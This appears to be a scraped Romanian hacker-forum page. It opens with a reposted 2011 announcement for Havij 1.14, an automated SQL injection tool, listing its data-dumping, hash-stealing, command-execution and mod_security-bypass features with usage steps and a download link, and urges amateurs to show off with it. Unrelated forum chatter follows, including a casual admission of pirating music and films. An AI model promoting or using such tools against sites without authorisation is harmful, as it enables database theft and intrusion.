Havij v1.14 Advanced SQL Injection Jan 08, 2011 Description: Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system. The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij. The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users. What's New? * Sybase (ASE) database added. * Sybase (ASE) Blind database added. * Time based method for MsSQL added. * Time based method for MySQL added. * mod_security bypass added. * Pause button added. * Basic authentication added * Digest authentication added. * Post Data field added * bugs related with dot character in database name fixed * syntax over writing when defined by user in blind injections fixed. * mssql database detection from error when using JDBC driver corrected. * time out bug in md5 cracker fixed. * default value bug fixed * string encode bug fixed in PostgreSQL * injecting URL rewrite pages added. * injecting into any part of http request like Cookie, User-Agent, Referer, etc made available * a bug in finding string column fixed. (specially for MySQL) * Finding columns count in mysql when input value is non effective added. * window resize bug in custom DPI setting fixed. * some bugs in finding row count fixed. * getting database name in mssql error based when injection type is guessed integer but it's string fixed. Features: http://itsecteam.com/en/projects/project1.htm How to use This tool is for exploiting SQL Injection bugs in web application. For using this tool you should know a little about SQL Injections. Enter target url and select http method then click Analyze. Note: Try to url be valid input that returns a normal page not a 404 or error page. Download: http://itsecteam.com/files/havij/Havij1.14Free.rar Hai baietii, fiti 1337 (script-kiddie...), aratati ca sunteti in stare sa folositi un program si vreau sa vad aere de mai hackeri la Show Off PS: Nu l-am incercat, nu stiu daca e infectat, dar cum il veti descarca de pe site-ul oficial cred ca nu este nici o problema.

Deocamdata nu am timp, o sa incep sesiunea, dar dupa seseiune o sa aloc mai mult timp pentru RST (daca nu ma angajez undeva) si treburile vor merge mai bine.

Si cam ce anume s-ar posta acolo? Ce ati posta de exemplu? Vreau niste exemple concrete. Ceva imi spune ca va fi cam pustie acea categorie.

Poate nu au poze clare cu acea galaxie si au vrut doar sa arate o imagine asemanatoare acelei galaxii. Ma refer la faptul ca este posibil sa aiba multe informatii despre acea galaxie, dar nu o fotografie concreta care sa fie relativ clara si care sa poata fi afisata publicului larg, astfel au creat acea imagine mai mult descriptiva a acelei fotografii.

Normal, stiri gen "Cancan", adica de 2 lei. Nici eu nu as vrea sa se inchida. Poti afla incredibil de mult informatii despre prieteni, despre cum gandesc, despre ce fac, tot felul de prostii.

Multumesc tuturor si la multi ani celorlalti membri care isi serbeaza azi ziua de nastere. Sa beti ceva si pentru mine, si eu o sa beau ceva pentru voi. romanu: Nu toti moderatorii/administratorii sunt Ioni PS: Ma puteti injura, critica etc. Nu ma supar, nu dau warn/ban. Hai, cat aveti ocazia :->

Haaa mersi boss, la multi ani si tie bre, sa ne traiesti. :-> Trebuie sa ne dam de baut unu altuia. Oricum inca trebuie sa iti dau 2 beri Mersi baieti. Azi nu dau banuri/warnuri

Sunt usoare, doar 9 e greu, trebuie sa faci Backtracking.

Warn tuturor. E treaba administratorilor si a moderatorilor asta. Ati facut offtopic toti

Toate sunt JavaScript. Nu sunt grele, trebuie doar putina imaginatie. Deocamdata sunt la nivelul 9, cred ca trec mai departe maine. http://www.telerie-effegibi.it/daniele/default.asp?lev=1 Bafta.

Windows? Nu, Linux. Si asta inseamna: nici un program piratat. Doar muzica (manele) mai descarc din cand in cand, si filme. De ce sa dau bani pe ceva cand pot avea gratis? E modul clasic si practic de a gandi.